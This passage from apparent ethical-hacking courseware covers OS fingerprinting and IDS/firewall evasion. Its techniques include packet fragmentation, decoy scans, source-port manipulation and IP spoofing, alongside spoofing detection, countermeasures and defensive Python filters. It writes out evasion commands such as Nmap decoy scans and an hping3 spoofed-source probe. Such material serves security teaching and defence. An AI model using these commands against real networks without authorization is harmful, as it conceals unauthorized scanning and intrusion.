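    for sample in (SAMPLE_LINUX, SAMPLE_WINDOWS):
        sig = parse_packet(sample)
        print(f"TTL {sig.ttl} -> initial {sig.initial_ttl}, {sig.hops} hops; "
              f"window {sig.window}; DF={sig.df}; TOS={sig.tos:#x}")
        print("  candidates:", ", ".join(match_os(sig)))
```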

Figure 3.77: Wireshark screenshot showing TTL value (Possible OS is Windows)

Figure 3.78: Wireshark screenshot showing TTL value
OS Discovery using Nmap and Unicornscan

OS Discovery using Nmap

Source: https://nmap.org
To exploit the target, it is highly essential to identify the OS running on the target machine. Attackers can employ various tools to acquire the OS details of the target. Nmap is one of the effective tools for performing OS discovery activities. In Zenmap, the -O option is used to perform OS discovery, which displays the OS details of the target machine.

Figure 3.79: OS Discovery using Zenmap

OS Discovery using Unicornscan

Source: https://sourceforge.net

In Unicornscan, the OS of the target machine can be identified by observing the TTL values in the acquired scan result. To perform Unicornscan, the syntax #unicornscan <target IP address> is used. As shown in the screenshot, the ttl value acquired after the scan is 128; hence, the OS is possibly Microsoft Windows (Windows 7/8/8.1/10 or Windows Server 2008/12/16).

Figure 3.80: OS Discovery using Unicornscan (Possible OS is Windows)

OS Discovery using Nmap Script Engine

Source: https://nmap.org

Nmap Scripting Engine (NSE) in Nmap can be used to automate a wide variety of networking tasks by allowing users to write and share scripts. These scripts can be executed parallelly with the same efficiency and speed as Nmap. Attackers can also use various scripts in the Nmap Script Engine for performing OS discovery on the target machine. For example, in Nmap, smb-os-discovery is an inbuilt script used for collecting OS information on the target machine through the SMB protocol.

In Zenmap, NSE can be generally activated using the -sC option. If the custom scripts are to be specified, then attackers can use the --script option. The NSE results will be displayed with both the Nmap normal and XML outputs.

Figure 3.81: OS Discovery using Nmap Script Engine

OS Discovery using IPv6 Fingerprinting

Source: https://nmap.org
IPv6 Fingerprinting is another technique used to identify the OS running on the target machine. It has the same functionality as IPv4, such as sending probes, waiting and collecting the responses, and matching them with the database of fingerprints. The difference between IPv6 and IPv4 fingerprinting is that IPv6 uses several additional advanced IPv6-specific probes along with a separate OS detection engine. Nmap sends nearly 18 probes in the following order to identify the target OS using the IPv6 fingerprinting method.

o Sequence generation (S1-S6)
o ICMPv6 echo (IE1)
o ICMPv6 echo (IE2)
o Node Information Query (NI)
o Neighbor Solicitation (NS)
o UDP (U1)
o TCP explicit congestion notification (TECN)
o TCP (T2-T7)

In Zenmap, the -6 option along with the -O option is used to perform OS discovery using the IPv6 fingerprinting method.

Syntax:
# nmap -6 -O <target>

Banner Grabbing Countermeasures

Disabling or Changing Banner

Whenever a port is open, it implies that a service/banner is running on it. When attackers connect to the open port using banner grabbing techniques, the system presents a banner containing sensitive information such as OS, server type, and version. Using the information gathered, the attacker identifies specific vulnerabilities to exploit and then launches attacks. The countermeasures against banner grabbing attacks are as follows:

o Display false banners to mislead or deceive attackers.
o Turn off unnecessary services on the network host to limit information disclosure.
o Use ServerMask (https://www.port80software.com) tools to disable or change banner information. ServerMask removes unnecessary HTTP header and response data and camouflages the server by providing false signatures. It also provides you with the option of eliminating file extensions such as .asp or .aspx, which clearly indicate that a site is running on a Microsoft server.

o Apache 2.x with mod_headers module: use a directive in the httpd.conf file to change the banner information header and set the server as "New Server Name". Alternatively, change the ServerSignature line to ServerSignature Off in the httpd.conf file.
o The details of the vendor and version in the banners should be disabled.

Hiding File Extensions from Web Pages

File extensions reveal information about the underlying server technology that an attacker can use to launch attacks. The countermeasures against such banner grabbing attacks are as follows:

o Hide file extensions to mask the web technology.
o Replace application mappings such as .asp with .htm or .foo, etc., to disguise the identity of the servers.
o Apache users can use mod_negotiation directives.
o IIS users can use tools such as PageXchanger to manage the file extensions.

Note: It would be better if the file extensions are not used at all.

Scanning Beyond IDS and Firewall

Intrusion detection systems (IDS) and firewalls are security mechanisms intended to prevent an attacker from accessing a network. However, even IDS and firewalls have some security limitations. Attackers try to launch attacks to exploit these limitations. This section highlights various IDS/firewall evasion techniques such as packet fragmentation, source routing, IP address spoofing, etc.

IDS/Firewall Evasion Techniques

Although firewalls and IDS can prevent malicious traffic (packets) from entering a network, attackers can send intended packets to the target that evade the IDS/firewall by implementing the following techniques:

o Packet Fragmentation: The attacker sends fragmented probe packets to the intended target, which reassembles the fragments after receiving all of them.
o Source Routing: The attacker specifies the routing path for the malformed packet to reach the intended target.
o Source Port Manipulation: The attacker manipulates the actual source port with the common source port to evade the IDS/firewall.
o IP Address Decoy: The attacker generates or manually specifies IP addresses of decoys so that the IDS/firewall cannot determine the actual IP address.
o IP Address Spoofing: The attacker changes the source IP addresses so that the attack appears to be coming from someone else.
o Creating Custom Packets: The attacker sends custom packets to scan the intended target beyond the firewalls.
o Randomizing Host Order: The attacker scans the number of hosts in the target network in a random order to scan the intended target that lies beyond the firewall.
o Sending Bad Checksums: The attacker sends packets with bad or bogus TCP/UDP checksums to the intended target.

o Proxy Servers: The attacker uses a chain of proxy servers to hide the actual source of a scan and evade certain IDS/firewall restrictions.
o Anonymizers: The attacker uses anonymizers, which allow them to bypass Internet censors and evade certain IDS and firewall rules.

Packet Fragmentation

Packet fragmentation refers to the splitting of a probe packet into several smaller packets (fragments) while sending it to a network. When these packets reach a host, the IDS and firewalls behind the host generally queue all of them and process them one by one. However, since this method of processing involves greater CPU and network resource consumption, the configuration of most IDS causes them to skip fragmented packets during port scans. Therefore, attackers use packet fragmentation tools such as Nmap and fragroute to split the probe packet into smaller packets that circumvent the port-scanning techniques employed by IDS. Once these fragments reach the destined host, they are reassembled to form a single packet.

SYN/FIN Scanning Using IP Fragments

This process of scanning using IP fragments is not a new scanning method but a modification of previous scanning techniques. It was developed to avoid the false positives generated by other scans when a packet filtering device on the target blocks the probes, that is, to evade the packet filtering system. The TCP header splits into several packets to evade the packet filter. For any transmission, every TCP header must have the source and destination port for the initial packet (8-octet, 64-bit). The initialized flags in the next packet allow the remote host to reassemble the packets upon receipt via an Internet protocol module that detects fragmented data packets using field-equivalent values of the source, destination, protocol, and identification.

Figure 3.82: SYN/FIN scanning (attacker sends SYN/FIN + Port (n) as small fragments; RST if port is closed)

In this scan, the system splits the TCP header into several fragments and transmits them over the network. However, IP reassembly on the server side may result in unpredictable and abnormal results, such as fragmentation of the IP header data. Some hosts may fail to parse and reassemble the fragmented packets, which may lead to crashes, reboots, or even network device monitoring dumps.

Some firewalls might have rule sets that block IP fragmentation queues in the kernel (e.g., the CONFIG_IP_ALWAYS_DEFRAG option in the Linux kernel), although this is not widely implemented because of its adverse effects on performance. Since many IDS use signature-based methods to indicate scanning attempts on IP and/or TCP headers, the use of fragmentation will often evade this type of packet filtering and detection, resulting in a high probability of causing problems on the target network. Attackers use the SYN/FIN scanning method with IP fragmentation to evade this type of filtering and detection. The screenshot below shows the SYN/FIN scan using the Nmap tool.

Figure 3.83: SYN/FIN scan using Nmap
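A filter-side check against the fragmented TCP header trick described above, written here as an added Python example (not from the courseware). It applies the two RFC 1858 rules for TCP fragments: a first fragment must carry enough of the TCP header for the flags to be visible, and a fragment at offset 1 (8 octets) is rejected because it would overlap the header on reassembly. The fragment records and the 16-byte threshold are the example's own choices.

```python
from dataclasses import dataclass
from typing import List

IPPROTO_TCP = 6
# Fragment offsets are counted in 8-octet units, which is why a probe whose
# first fragment carries only the 8-byte source/destination port pair (as in
# the SYN/FIN scan above) leaves the TCP flags for a later fragment.
FRAGMENT_UNIT = 8
# Bytes of transport header required in a first fragment. The TCP flags sit in
# header bytes 13-14, so 16 bytes guarantees a filter can see them (the value
# is this example's choice, in line with RFC 1858).
MIN_FIRST_FRAGMENT = 16


@dataclass(frozen=True)
class Fragment:
    """Fields of one IP fragment that a filter can see without reassembly."""
    ip_id: int
    protocol: int
    offset: int          # fragment offset in 8-octet units
    more_fragments: bool
    payload_len: int     # bytes of transport data in this fragment


def fragment_verdict(frag: Fragment) -> str:
    """Return 'pass' or a reason to drop, following RFC 1858 for TCP."""
    if frag.protocol != IPPROTO_TCP:
        return "pass"
    if (frag.offset == 0 and frag.more_fragments
            and frag.payload_len < MIN_FIRST_FRAGMENT):
        # Tiny fragment: the flags are not in this fragment, so a filter that
        # inspects only the first fragment cannot see SYN/FIN.
        return "drop: tiny first fragment hides TCP flags"
    if frag.offset == 1:
        # Overlapping fragment: an 8-byte offset lands inside the TCP header and
        # could overwrite the flags of the first fragment on reassembly.
        return "drop: fragment offset 1 overlaps TCP header"
    return "pass"


def filter_fragments(frags: List[Fragment]) -> List[str]:
    """Apply fragment_verdict to each fragment of a captured sequence."""
    return [fragment_verdict(f) for f in frags]


# Constructed sample: a SYN/FIN probe split so that the first fragment holds
# only the ports and the second fragment (offset 1) carries the flags.
TINY_PROBE = [
    Fragment(ip_id=0x1234, protocol=IPPROTO_TCP, offset=0,
             more_fragments=True, payload_len=8),
    Fragment(ip_id=0x1234, protocol=IPPROTO_TCP, offset=1,
             more_fragments=False, payload_len=12),
]
# Constructed sample: an ordinary large TCP segment fragmented by a router,
# whose first fragment carries the full 20-byte header plus data.
NORMAL_FRAGMENTS = [
    Fragment(ip_id=0x2222, protocol=IPPROTO_TCP, offset=0,
             more_fragments=True, payload_len=1480),
    Fragment(ip_id=0x2222, protocol=IPPROTO_TCP, offset=1480 // FRAGMENT_UNIT,
             more_fragments=False, payload_len=520),
]

if __name__ == "__main__":
    for name, frags in (("tiny probe", TINY_PROBE), ("normal", NORMAL_FRAGMENTS)):
        print(name, filter_fragments(frags))
```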

Source Routing

An IP datagram contains various fields, including the IP options field, which stores source routing information and includes a list of IP addresses through which the packet travels to its destination. As the packet travels through the nodes in the network, each router examines the destination IP address and chooses the next hop to direct the packet to the destination.

When attackers send malformed packets to a target, these packets hop through various routers and gateways to reach the destination. In some cases, the routers in the path might include configured firewalls and IDS that block such packets. To avoid them, attackers enforce a loose or strict source routing mechanism, in which they manipulate the IP address path in the IP options field so that the packet takes the attacker-defined path (without firewall-/IDS-configured routers) to reach the destination, thereby evading firewalls and IDS.

The figure below shows source routing, where the originator dictates the eventual route of the traffic.

Figure 3.84: Source Routing

Source Port Manipulation

Source port manipulation is a technique used for bypassing the IDS/firewall, where the actual port numbers are manipulated with common port numbers for evading certain IDS and firewall rules. The main security misconfigurations occur because of blindly trusting the source port number. The administrator mostly configures the firewall by allowing the incoming traffic from well-known ports such as HTTP, DNS, FTP, etc. The firewall can simply allow the incoming traffic from the packets sent by the attackers using such common ports.

Figure 3.85: Firewall allowing manipulated port 80 to the Victim from attacker

Although the firewalls can be made secure using application-level proxies or protocol-parsing firewall elements, this technique helps the attacker to bypass the firewall rules easily. The attacker tries to manipulate the original source port number with the common port numbers, which can easily bypass the IDS/firewall. In Zenmap, the -g or --source-port option is used to perform source port manipulation.

Figure 3.86: Scanning over Firewall using Nmap

IP Address Decoy

The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls. It appears to the target that the decoys as well as the host(s) are scanning the network. This technique makes it difficult for the IDS/firewall to determine which IP address is actually scanning the network and which IP addresses are decoys.

The Nmap tool comes with a built-in scan function called a decoy scan, which cloaks a scan with decoys. This technique generates multiple IP addresses to perform a scan, thus making it difficult for the target security mechanisms such as IDS, firewalls, etc., to identify the original source from the registered logs. The target IDS might report scanning from 5-10 IP addresses; however, it cannot differentiate between the actual scanning IP address and the innocuous decoy IPs.

You can perform two types of decoy scans using Nmap:

o nmap -D RND:10 [target]

Using this command, Nmap automatically and randomly generates a random number of decoys for the scan and positions the real IP address between the decoy IPs.

Ex. Assume that 10.10.10.10 is the target IP address to be scanned. Thus, the Nmap decoy scan command will be:

# nmap -D RND:10 10.10.10.10

Figure 3.87: RND Decoy using Nmap

o nmap -D decoy1,decoy2,decoy3,...,ME,... [target] option
Using this command, you can manually specify the IP addresses of the decoys to scan the victim's network. Here, you have to separate each decoy IP with a comma (,) and you can optionally use the ME command to position your real IP in the decoy list. If you place ME in the 4th position of the command, your real IP will be positioned at the 4th position accordingly. This is an optional command, and if you do not mention ME in your scan command, then Nmap will automatically place your real IP in any random position.

For example, assume that 10.10.10.16 is the real source IP and 10.10.10.10 is the target IP address to be scanned. Then, the Nmap decoy command will be:

Syntax
# nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.10.16,10.10.10.5 10.10.10.10

Figure 3.88: Decoy with manual decoy list using Nmap

These decoys can be generated in both initial ping scans such as ICMP, SYN, ACK, etc., and during the actual port scanning phase. IP address decoy is a useful technique for hiding your IP address. However, it will not be successful if the target employs active mechanisms such as router path tracing, response dropping, etc. Moreover, using many decoys can slow down the scanning process and affect the accuracy of the scan.

IP Address Spoofing

Most firewalls filter packets based on the source IP address. These firewalls examine the source IP address and determine whether the packet is coming from a legitimate source or an illegitimate source. The IDS filters packets from illegitimate sources. Attackers use the IP spoofing technique to bypass such IDS/firewalls.

IP address spoofing is a hijacking technique in which an attacker obtains a computer's IP address, alters the packet headers, and sends request packets to a target machine, pretending to be a legitimate host. The packets appear to be sent from a legitimate machine but are actually sent from the attacker's machine, while his/her machine's IP address is concealed. When the victim replies to the address, it goes back to the spoofed address and not the attacker's real address. Attackers mostly use IP address spoofing to perform DoS attacks.

When the attacker sends a connection request to the target host, the target host replies to the spoofed IP address. When spoofing a nonexistent address, the target replies to a nonexistent system and then hangs until the session times out, thus consuming a significant amount of its own resources.

IP spoofing using Hping3:

Hping3 www.certifiedhacker.com -a 7.7.7.7

Figure 3.89: IP Spoofing using Hping3

You can use Hping3 to perform IP spoofing. The above command helps you to send arbitrary TCP/IP packets to network hosts.

Note: You will not be able to complete the three-way handshake and open a successful TCP connection with spoofed IP addresses.

IP Spoofing Detection Techniques

Direct TTL Probes

In this technique, you initially send a packet (ping request) to the host and wait for a reply. Check whether the TTL value in the reply matches with that of the packet you are checking. Both will have the same TTL if they are using the same protocol. Although the initial TTL values vary according to the protocol used, a few initial TTL values are commonly used. For TCP/UDP, the values are 64 and 128; for ICMP, they are 128 and 255.

Figure 3.90: IP Spoofing detection techniques: Direct TTL Probes
If the reply is from a different protocol, then you should check the actual hop count to detect the spoofed packets. Deduct the TTL value in the reply from the initial TTL value to determine the hop count. The packet is a spoofed packet if the TTL of the reply does not match the TTL of the packet. It will be very easy to launch an attack if the attacker knows the hop count between the source and the host. In this case, the test result is a false negative.

This technique is successful when the attacker is in a different subnet from that of the victim.

Note: Normal traffic from one host can contrast TTLs depending on traffic patterns.

IP Identification Number

Users can identify spoofed packets by monitoring the IP identification (IPID) number in the IP packet headers. The IPID increases incrementally each time a system sends a packet. Every IP packet on the network has a "fragment identification" number, which is increased by one for every packet transmission. To identify whether a packet is spoofed, send a probe packet to the source IP address of the packet and observe the IPID number in the reply. The IPID value in the response packet must be close to but slightly greater than the IPID value of the probe packet. The source address of the IP packet is spoofed if the IPID of the response packet is not close to that of the probe packet. This method is effective even when both the attacker and the target are on the same subnet.

Figure 3.91: IP Spoofing detection technique: IP Identification Number

TCP Flow Control Method

TCP can optimize the flow control on both the sender's and the receiver's end with its algorithm. The algorithm accomplishes flow control using the sliding window principle. The user can control the flow of IP packets by the window size field in the TCP header. This field represents the maximum amount of data that the recipient can receive and the maximum amount of data that the sender can transmit without acknowledgement. Thus, this field helps to control data flow. The sender should stop sending data whenever the window size is set to zero.

In general flow control, the sender should stop sending data once the initial window size is exhausted. The attacker, who is unaware of the ACK packet containing window size information, might continue to send data to the victim. If the victim receives data packets beyond the window size, they are spoofed packets. For effective flow control and early detection of spoofing, the initial window size must be very small.

Most spoofing attacks occur during the handshake, as it is challenging to build multiple spoofed replies with the correct sequence number. Therefore, apply the flow control spoofed packet detection method to the handshake. In a TCP handshake, the host sending the initial SYN packet waits for the SYN-ACK before sending the ACK packet. To check whether you are getting the SYN request from a genuine client or a spoofed one, set the window size in the SYN-ACK packet to zero. If the sender sends an ACK with any data, it means that the sender is a spoofed one. This is because when the SYN-ACK window size is set to zero, the sender must respond to it only with the ACK packet, without additional data.

Figure 3.92: IP Spoofing detection technique: TCP Flow Control Method
Attackers sending spoofed TCP packets will not receive the target's SYN-ACK packets. Attackers cannot respond to changes in the congestion window size. When the received traffic continues after a window size is exhausted, the packets are most likely spoofed.
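The three detection heuristics above (direct TTL probe, IP ID probe, and the TCP flow-control check on the handshake) written out as decision functions over constructed packet records. This is an added example and is not part of the CEH courseware. The packet dicts, the 16-bit IP ID tolerance of 10, and the choice to compare the reply's IP ID with the IP ID of the packet under suspicion are assumptions made for the example; the initial TTL values 64, 128 and 255 are the defaults the text lists.

```python
# Added example (not part of the CEH courseware): the three spoofing detection
# heuristics described above, applied to constructed packet records. Dicts stand
# in for decoded headers; nothing is sent on a network.

COMMON_INITIAL_TTLS = (64, 128, 255)   # initial TTL defaults listed in the text


def hop_count(observed_ttl: int) -> int:
    """Estimate hops travelled: nearest common initial TTL at or above the
    observed value, minus the observed value (the deduction the text describes).
    The union of the TCP/UDP and ICMP defaults is used regardless of protocol."""
    if not 0 <= observed_ttl <= 255:
        raise ValueError("TTL must be 0..255")
    initial = min(t for t in COMMON_INITIAL_TTLS if t >= observed_ttl)
    return initial - observed_ttl


def ttl_probe_verdict(suspect_ttl: int, reply_ttl: int, same_protocol: bool) -> str:
    """Direct TTL probe. Same protocol: the suspect packet's TTL and the TTL of the
    reply we elicited from the claimed source must match exactly. Different
    protocol: compare the derived hop counts instead."""
    if same_protocol:
        return "consistent" if suspect_ttl == reply_ttl else "spoofed"
    return "consistent" if hop_count(suspect_ttl) == hop_count(reply_ttl) else "spoofed"


def ipid_probe_verdict(suspect_ipid: int, reply_ipid: int, tolerance: int = 10) -> str:
    """IP ID probe. The reply's IP ID is compared with the IP ID of the packet under
    suspicion (assumed to be the intended comparison): a real sender's counter has
    moved on by only a few packets. `tolerance` is an assumed value, not from the text."""
    delta = (reply_ipid - suspect_ipid) % 65536   # the 16-bit counter wraps
    return "consistent" if 0 < delta <= tolerance else "spoofed"


def handshake_window_verdict(synack_window: int, ack_payload_len: int) -> str:
    """TCP flow-control check on the handshake: we advertised a zero window in the
    SYN-ACK, so a client that really received it must send a bare ACK."""
    if synack_window == 0 and ack_payload_len > 0:
        return "spoofed"
    return "consistent"


def flow_verdict(advertised_window: int, unacked_bytes_received: int) -> str:
    """General flow-control check: data beyond the advertised window did not come
    from a peer that is reading our acknowledgements."""
    return "spoofed" if unacked_bytes_received > advertised_window else "consistent"


def classify(suspect: dict, reply: dict) -> dict:
    """Run the two probe-based checks on one suspect packet and the probe reply."""
    same = suspect["proto"] == reply["proto"]
    return {
        "ttl": ttl_probe_verdict(suspect["ttl"], reply["ttl"], same),
        "ipid": ipid_probe_verdict(suspect["ipid"], reply["ipid"]),
    }


# Constructed sample records, not captured traffic.
CASES = {
    "genuine, same protocol": (
        {"ttl": 62, "ipid": 1000, "proto": "tcp"},
        {"ttl": 62, "ipid": 1003, "proto": "tcp"},
    ),
    "spoofed, probe answered over ICMP": (
        {"ttl": 116, "ipid": 40000, "proto": "tcp"},
        {"ttl": 59, "ipid": 1500, "proto": "icmp"},
    ),
}

if __name__ == "__main__":
    for name, (suspect, reply) in CASES.items():
        print(name, classify(suspect, reply))
    print("zero-window SYN-ACK, ACK with 20 bytes:", handshake_window_verdict(0, 20))
```

The caveats in the text carry over: an attacker who knows the hop count between the claimed source and the host defeats the TTL check (false negative), and the IP ID check only works against senders whose IP ID counter is sequential. The zero-window handshake check stalls genuine clients too, which is why the text confines it to the handshake.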

IP Spoofing Countermeasures

- Encrypt the network traffic using cryptographic network protocols such as IPsec, TLS, SSH, and HTTPS
- Use multiple firewalls to provide multilayered depth of protection
- Do not rely on IP-based authentication
- Use random initial sequence numbers to prevent IP spoofing attacks based on sequence number spoofing
- Ingress Filtering: Use routers and firewalls at your network perimeter to filter incoming packets that appear to come from an internal IP address
- Egress Filtering: Filter all outgoing packets with an invalid local IP address in the source address

IP Spoofing Countermeasures

In ethical hacking, the ethical hacker, also known as "pen tester," has an additional task that a normal hacker does not follow (i.e., adopting countermeasures against the respective vulnerabilities determined through hacking). This is essential because knowing security loopholes in your network is worthless unless you adopt measures to protect them against real hackers. As mentioned previously, IP spoofing is one of the techniques that a hacker adopts to break into the target network. Therefore, to protect your network from external hackers, you should apply IP spoofing countermeasures to your network security settings. Some IP spoofing countermeasures that you can apply are as follows:

Avoid trust relationships

Do not rely on IP-based authentication. Attackers may spoof themselves as trusted hosts and send malicious packets to you. If you accept these packets under the assumption that they are "clean" because they are from your trusted host, the malicious code will infect your system. Therefore, it is advisable to test all packets, even when they come from one of your trusted hosts. You can avoid this problem by implementing password authentication along with trust-relationship-based authentication.
Use firewalls and filtering mechanisms

As stated above, you should filter all the incoming and outgoing packets to avoid attacks and sensitive information loss. A firewall can restrict malicious packets from entering your private network and prevent severe data loss. You can use access control lists (ACLs) to block unauthorized access. At the same time, there is a possibility of an insider attack. Inside attackers can send sensitive information about your business to your competitors, which could lead to monetary loss and other issues. Another risk of outgoing packets is that an attacker will succeed in installing a malicious sniffing program running in a hidden mode on your network. These programs gather and send all your network information to the attacker without any notification after filtering the outgoing packets. Therefore, you should assign the same importance to the scanning of outgoing packets as you would to that of incoming packets.
Use random initial sequence numbers

Most devices choose their ISN based on timed counters. This makes the ISNs predictable, as it is easy for an attacker to determine the concept of generating the ISN. The attacker can determine the ISN of the next TCP connection by analyzing the ISN of the current session or connection. If the attacker can predict the ISN, then he/she can establish a malicious connection to the server and sniff out your network traffic. To avoid this risk, use random initial sequence numbers.
Ingress filtering

Ingress filtering prevents spoofed traffic from entering the Internet. It is applied to routers because it enhances the functionality of the routers and blocks spoofed traffic. Configuring routers and using ACLs that drop packets with the source address outside the defined range is one method of implementing ingress filtering.

Egress filtering

Egress filtering refers to a practice that aims to prevent IP spoofing by blocking outgoing packets with a source address that is not inside.
Use encryption

If you want to attain maximum network security, then use strong encryption for all the traffic placed onto the transmission media without considering its type and location. This is the best way to prevent IP spoofing attacks. IPsec can be used to reduce the IP spoofing risk drastically, as it provides data authentication, integrity, and confidentiality. Furthermore, ACLs can be used for blocking private IP addresses at the downstream interfaces. Encryption sessions should be enabled on the router so that trusted hosts can communicate securely with local hosts. Attackers tend to focus on easy-to-compromise targets. If an attacker wants to break into the encrypted network, he or she has to decrypt a whole slew of encrypted packets, which is likely a difficult task. Therefore, the attacker is likely to move on and try to find another target that is easy to compromise or simply abort the attempt. Moreover, use the latest encryption algorithms that provide strong security.
SYN flooding countermeasures

Countermeasures against SYN flooding attacks can also help you to avoid IP spoofing attacks.
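The ingress and egress filtering items above describe what a perimeter router's ACLs decide: drop inbound packets whose source claims to be inside (or is otherwise unroutable), and drop outbound packets whose source is not inside. The following is an added example, not part of the courseware or of any router's configuration language, that makes those decisions in Python on constructed packet records. The internal prefix 203.0.113.0/24 is a placeholder from a documentation range, and the bogon list is an assumed set of commonly filtered ranges rather than something the text specifies.

```python
# Added example (not from the CEH courseware): ingress/egress filtering decisions
# as a perimeter router's ACLs would make them, applied to constructed packets.
import ipaddress

# Assumed address plan for the example: the organization's own prefix (a
# documentation range, TEST-NET-3, used as a placeholder).
INTERNAL_NETS = [ipaddress.ip_network("203.0.113.0/24")]

# Assumed bogon list: source addresses that should never arrive from the Internet.
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]


def _in_any(addr: ipaddress.IPv4Address, nets) -> bool:
    return any(addr in n for n in nets)


def ingress_decision(src: str) -> str:
    """Inbound on the external interface: a packet that claims an internal source or
    an unroutable source cannot legitimately come from outside, so it is dropped."""
    addr = ipaddress.ip_address(src)
    if _in_any(addr, INTERNAL_NETS):
        return "drop: internal source arriving from outside"
    if _in_any(addr, BOGON_NETS):
        return "drop: unroutable source"
    return "permit"


def egress_decision(src: str) -> str:
    """Outbound on the external interface: only our own prefix may leave, so a host
    inside cannot emit packets with a forged foreign source."""
    addr = ipaddress.ip_address(src)
    return "permit" if _in_any(addr, INTERNAL_NETS) else "drop: source not inside our prefix"


def apply_acl(packets):
    """packets: iterable of (direction, src, dst) with direction 'in' or 'out'.
    Returns one (direction, src, dst, decision) tuple per packet."""
    results = []
    for direction, src, dst in packets:
        decision = ingress_decision(src) if direction == "in" else egress_decision(src)
        results.append((direction, src, dst, decision))
    return results


# Constructed sample traffic at the perimeter.
SAMPLE = [
    ("in", "198.51.100.7", "203.0.113.10"),   # ordinary inbound packet
    ("in", "203.0.113.9", "203.0.113.10"),    # claims to be us, arriving from outside
    ("in", "10.1.2.3", "203.0.113.10"),       # RFC 1918 source from the Internet
    ("out", "203.0.113.9", "198.51.100.7"),   # ordinary outbound packet
    ("out", "10.1.2.3", "198.51.100.7"),      # inside host forging a foreign source
]

if __name__ == "__main__":
    for row in apply_acl(SAMPLE):
        print(row)
```

The same two rules are what the "Use encryption" item refers to when it mentions ACLs blocking private IP addresses at downstream interfaces; the exact ACL syntax depends on the router vendor and is not shown here.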

Creating Custom Packets

- Creating Custom Packets by using Packet Crafting Tools
- Creating Custom Packets by Appending Custom Binary Data
- Creating Custom Packets by Appending Custom String
- Creating Custom Packets by Appending Random Data

Creating Custom Packets

The attacker creates and sends custom packets to scan the intended target beyond the IDS/firewalls. Various techniques are used to create custom packets. Some of them are mentioned below:

Creating Custom Packets by using Packet Crafting Tools

Attackers create custom TCP packets to scan the target by bypassing the firewalls. Attackers use various packet crafting tools such as Colasoft Packet Builder (https://www.colasoft.com), NetScanTools Pro (https://www.netscantools.com), etc., to scan the target that is beyond the firewall. Packet crafting tools craft and send packet streams (custom packets) using different protocols at different transfer rates.

Colasoft Packet Builder

Source: https://www.colasoft.com

Colasoft Packet Builder is a tool that allows an attacker to create custom network packets and helps security professionals assess the network. The attacker can select a TCP packet from the provided templates and change the parameters in the decoder, hexadecimal, or ASCII editor to create a packet. In addition to building packets, Colasoft Packet Builder supports saving packets to packet files and sending packets to the network.
Figure 3.93: Screenshot of Colasoft Packet Builder

- There are three views in the Packet Builder: Packet List, Decode Editor, and Hex Editor. Packet List displays all the constructed packets. When you select one or more packets in Packet List, the first highlighted packet is displayed in both Decode Editor and Hex Editor for editing.

- In Hex Editor, the data of the packet are represented as hexadecimal values and ASCII characters; nonprintable characters are represented by a dot in the ASCII section. You can edit either the hexadecimal values or ASCII characters.
- Decode Editor allows the attacker to edit the packets without remembering value length, byte order, and offsets. You can select a field and change the value in the edit box.

For creating a packet, you can use the add or insert packet command in the Edit menu or the Toolbar to create a new packet.

The attacker can send a constructed packet to the wire directly and control how Colasoft Packet Builder sends the packets, specifying, for example, the interval between packets, loop times, and delay between loops.
This packet builder audits networks and checks the network protection against attacks and intruders. Attackers may use this packet builder to create fragmented packets to bypass network firewalls and IDS systems. They can also create packets and flood the victim with a very large number of packets, which could result in DoS attacks.
Creating Custom Packets by Appending Custom Binary Data

Attackers send binary data (0's and 1's) as payloads in the packets sent to the target machine present behind the firewall. The option used by Nmap for appending custom binary data to the sent packets is --data <hex string>. Any <hex string> is specified in the formats 0xAABBCCDDEEFF<...>, AABBCCDDEEFF<...>, or \xAA\xBB\xCC\xDD\xEE\xFF<...>. To perform a byte-order conversion, the specified information should be based on the receiver's expectations. Attackers can use this technique to scan the target by manipulating the firewalls by appending custom binary or hex data to the sent packets.

Example: --data 0xdeadbeef (or) --data \xCA\xFE\x09

Figure 3.94: Screenshot of appending binary string in Zenmap
Creating Custom Packets by Appending Custom String

Attackers send regular strings as payloads in the packets sent to the target machine for scanning beyond the firewall. The option used by Nmap for appending a custom string to the sent packets is --data-string <string>. The <string> can contain any string; however, a few characters depend on the system's locale, and it is not guaranteed whether the same information is retrieved. The string is enclosed with double quotes (") and special characters from the shell are not used. Attackers can use this technique to scan the target by manipulating the firewalls by appending custom string data to the sent packets.

Example: --data-string "Scan conducted by Security Ops, extension 7192" (or) --data-string "Ph34r my 133t skills"

Figure 3.95: Screenshot of appending custom string in Zenmap

Creating Custom Packets by Appending Random Data
Attackers append a number of random data bytes to most packets sent without using any protocol-specific payloads. The option used by Nmap for appending random data to the sent packets is --data-length <number>. For no protocol-specific or random payloads, --data-length 0 is used. The (-O) OS detection packets are not affected, as probe consistency is needed for it to be accurate. By default, a few UDP ports and IP protocols get a custom payload. Attackers can use this technique to scan the target by manipulating firewalls by appending random data or numbers to the sent packets.

Example: --data-length 1 (or) --data-length 5
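The three payload-appending options above (--data, --data-string and --data-length) all produce scan probes that carry data where an ordinary client sends none. The following added example, which is not part of the courseware and not Nmap's own code, does two things: it parses the three hex-string spellings that the text lists for --data into the bytes that end up in the packet, and it runs a simple defender-side check over constructed packet records that flags SYN segments carrying a payload. The packet dict fields (src, dst, flags, payload) and the sample addresses are assumptions made for the example.

```python
# Added example (not part of the CEH courseware or of Nmap): parse the --data
# hex-string formats and flag SYN probes that carry a payload. Packet records
# are constructed dicts, not captured traffic.
import re

_HEX_RUN = re.compile(r"[0-9A-Fa-f]+")


def parse_data_hex(spec: str) -> bytes:
    """Accept 0xAABB..., AABB... or \\xAA\\xBB... (the spellings the text lists
    for Nmap's --data option) and return the payload bytes."""
    s = spec.strip()
    if s[:2].lower() == "0x":
        s = s[2:]
    else:
        s = re.sub(r"\\[xX]", "", s)      # strip each \x prefix, leaving hex digits
    if not s or len(s) % 2 or not _HEX_RUN.fullmatch(s):
        raise ValueError(f"not a valid --data hex string: {spec!r}")
    return bytes.fromhex(s)


def is_valid_data_hex(spec: str) -> bool:
    try:
        parse_data_hex(spec)
        return True
    except ValueError:
        return False


def syn_probes_with_payload(packets, min_len: int = 1):
    """Flag TCP segments with only SYN set that carry at least min_len payload
    bytes. Ordinary clients send an empty SYN, so a payload here is a sign of
    crafted probes. Returns (src, dst, payload_length) per hit."""
    hits = []
    for p in packets:
        if p["flags"] == {"SYN"} and len(p["payload"]) >= min_len:
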